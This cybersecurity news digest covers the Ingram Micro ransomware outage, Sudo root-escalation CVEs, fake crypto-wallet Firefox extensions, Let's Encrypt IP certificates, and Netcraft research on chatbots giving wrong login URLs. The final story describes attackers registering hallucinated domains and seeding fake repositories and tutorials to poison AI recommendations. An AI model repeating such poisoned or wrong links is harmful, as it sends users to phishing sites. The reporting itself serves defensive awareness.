Ingram Micro Suffers Global Outage Following SafePay Ransomware Attack
Critical Sudo Vulnerabilities Enable Local Users to Gain Root Access Across Major Linux Distributions
Over 40 Fake Cryptocurrency Wallet Extensions Infiltrate Firefox Store to Steal Digital Assets
Let's Encrypt Introduces Free IP Address Certificates, Challenging Traditional Domain Name Model
ChatGPT URL Errors Create New Phishing Opportunities for Cybercriminals
Ingram Micro Suffers Global Outage Following SafePay Ransomware Attack
IT distribution giant Ingram Micro has experienced a widespread system outage following a SafePay ransomware attack that occurred late last week, forcing the company to shut down internal systems and disrupting services worldwide. The cyberattack has rendered the company's website and online ordering systems inaccessible, with employees discovering ransom notes on their devices as the breach was uncovered. Sources indicate that threat actors gained initial access through Ingram Micro's GlobalProtect VPN platform, prompting the company to advise employees against using the compromised VPN service and directing some staff to work from home as a precautionary measure.
The attack has significantly impacted Ingram Micro's core business operations, including the AI-powered Xvantage distribution platform and the Impulse license provisioning platform, which are essential for the company's technology distribution services to resellers and managed service providers globally. Despite the widespread disruption, some internal services including Microsoft 365, Teams, and SharePoint continue to operate normally, allowing basic communications to function. The company has yet to publicly acknowledge the ransomware attack, only issuing internal advisories about ongoing IT issues without disclosing the cybersecurity incident to employees or customers.
The SafePay ransomware group, which emerged in November 2024, has rapidly established itself as one of the more active ransomware operations in 2025, accumulating over 220 victims in less than a year. The group is known for targeting corporate networks through VPN gateways using compromised credentials and password spray attacks, making organizations with inadequate VPN security particularly vulnerable. The attack on Ingram Micro, one of the world's largest business-to-business technology distributors, demonstrates the growing sophistication and reach of ransomware operations, with potential implications for the broader technology supply chain that depends on the company's distribution and service capabilities.
Critical Sudo Vulnerabilities Enable Local Users to Gain Root Access Across Major Linux Distributions
https://thehackernews.com/2025/07/critical-sudo-vulnerabilities-let-local.html
Cybersecurity researchers have disclosed two critical security flaws in the Sudo command-line utility for Linux and Unix-like operating systems that could enable local attackers to escalate their privileges to root on vulnerable machines. The vulnerabilities, designated CVE-2025-32462 and CVE-2025-32463, were discovered by Stratascale researcher Rich Mirch and affect Sudo versions prior to 1.9.17p1. The first vulnerability has existed undetected for over 12 years since its introduction in September 2013, while the second represents a critical-severity flaw that exploits the chroot functionality to execute arbitrary commands with elevated privileges.
CVE-2025-32462, with a CVSS score of 2.8, exploits Sudo's host option feature to allow listed users to execute commands on unintended machines when using sudoers files that specify hosts other than the current machine. The flaw primarily affects environments using common sudoers files distributed across multiple machines or LDAP-based sudoers configurations including SSSD. Meanwhile, CVE-2025-32463 carries a critical CVSS score of 9.3 and leverages Sudo's chroot option to enable any unprivileged local user to gain root access by tricking sudo into loading arbitrary shared libraries through a malicious nsswitch.conf configuration file, even without specific sudo rules defined for the user.
The vulnerabilities have been addressed in Sudo version 1.9.17p1 released in late June 2025, following responsible disclosure on April 1, 2025. Major Linux distributions including AlmaLinux, Alpine Linux, Amazon Linux, Debian, Gentoo, Oracle Linux, Red Hat, SUSE, and Ubuntu have issued security advisories and patches to address these flaws. Sudo project maintainer Todd C. Miller announced that the chroot option will be completely removed from future releases, citing that supporting user-specified root directories is inherently error-prone and poses significant security risks to system integrity.
Over 40 Fake Cryptocurrency Wallet Extensions Infiltrate Firefox Store to Steal Digital Assets
https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486
More than 40 malicious browser extensions impersonating popular cryptocurrency wallets have flooded Firefox's official add-ons store, designed to steal wallet credentials and sensitive data from unsuspecting users. The fake extensions masquerade as legitimate wallets from trusted providers including Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero, incorporating malicious code that exfiltrates stolen information to attacker-controlled servers. Researchers at Koi Security discovered the campaign and identified evidence pointing to a Russian-speaking threat group behind the operation, which has been active since at least April 2025 with new malicious entries appearing as recently as last week.
The malicious extensions are sophisticated clones of open-source versions of legitimate wallets enhanced with dangerous functionality that monitors user inputs for sensitive data. The embedded code includes input and click event listeners that specifically target strings longer than 30 characters to identify realistic wallet keys and seed phrases, which are then secretly transmitted to the attackers. The extensions hide error dialogs from users by setting opacity to zero, preventing victims from detecting the malicious activity while their recovery phrases are being stolen. Since seed phrases serve as master keys for cryptocurrency wallets, obtaining them allows attackers to steal all digital assets in a wallet through transactions that appear legitimate and are irreversible.
Despite Mozilla's development of an early detection system for crypto scam extensions that uses automated indicators and human reviewers, the fake wallet extensions continue to proliferate in the Firefox store. The threat actors build credibility by using authentic logos from the brands they impersonate and generating hundreds of fake five-star reviews, though some extensions also display numerous one-star reviews from victims reporting the scam. Although Koi Security reported their findings to Mozilla through official channels, the malicious extensions remained available at the time of their report, highlighting the ongoing challenge of combating cryptocurrency-focused malware in browser extension marketplaces where the sheer volume of fake reviews often exceeds actual installation numbers.
Let's Encrypt Introduces Free IP Address Certificates, Challenging Traditional Domain Name Model
https://letsencrypt.org/2025/07/01/issuing-our-first-ip-address-certificate/
Let's Encrypt, the popular certificate authority known for providing free TLS/SSL certificates, has begun issuing digital certificates for IP addresses at no cost. While other certificate authorities like PositiveSSL, Sectigo, and GeoTrust offer similar services for $40 to $90 annually, Let's Encrypt's free offering represents a significant shift in the certificate landscape. The service allows users with static IP addresses to host websites using numeric identifiers while maintaining secure connections, eliminating the need to purchase domain names that typically cost between $10 and $50 per year.
The new IP address certificates serve several practical purposes, according to Aaron Gable, principal engineer at Let's Encrypt. Hosting providers can use them to create default landing pages when users type IP addresses directly into browsers, similar to how Cloudflare handles 1.1.1.1 and Google manages 8.8.8.8. The certificates also benefit servers supporting DNS over HTTPS protocols and can secure short-lived connections for server administration or home network devices like network-attached storage servers.
However, the implementation comes with notable limitations and security considerations. Let's Encrypt restricts IP address certificates to just six days of validity, part of the industry's broader move toward short-lived certificates to reduce fraud risks. The service acknowledges several drawbacks to IP-based websites, including the instability of dynamically allocated IP addresses from ISPs, the lack of established arbitration rules for IP disputes, and potential negative impacts on load times and search engine optimization when backend changes require redirects. The IP certificate feature is currently available in Let's Encrypt's staging environment and will become generally available later this year.
ChatGPT URL Errors Create New Phishing Opportunities for Cybercriminals
https://www.netcraft.com/blog/large-language-models-are-falling-for-phishing-scams
ChatGPT and other AI chatbots are providing incorrect website URLs for major companies at alarming rates, creating new opportunities for cybercriminals to exploit unsuspecting users. According to research by threat intelligence firm Netcraft, GPT-4.1 family models deliver the correct web address only 66 percent of the time when asked for company login pages. The remaining responses include 29 percent that point to dead or suspended sites and 5 percent that direct users to legitimate but incorrect websites.
This accuracy problem presents a significant security risk as criminals can exploit the AI's mistakes by purchasing unregistered domains that appear in chatbot responses and setting up phishing sites. Rob Duncan, Netcraft's lead of threat research, explained that attackers simply need to identify what mistakes the AI models are making and then take advantage of those errors. The issue stems from AI systems focusing on word associations rather than evaluating actual URLs or website reputations, making them vulnerable to manipulation by sophisticated phishing operations.
Cybercriminals are already adapting their tactics to target AI-powered search behaviors, moving away from traditional search engine optimization to focus on poisoning chatbot results. Netcraft researchers discovered attackers creating elaborate fake ecosystems, including dozens of GitHub repositories, Q&A documents, tutorials, and fake social media accounts, all designed to trick AI systems into recommending malicious resources. This represents a significant evolution in phishing techniques, as criminals recognize that users increasingly rely on AI chatbots instead of conventional search engines while remaining unaware that these systems can provide incorrect information.
Share this post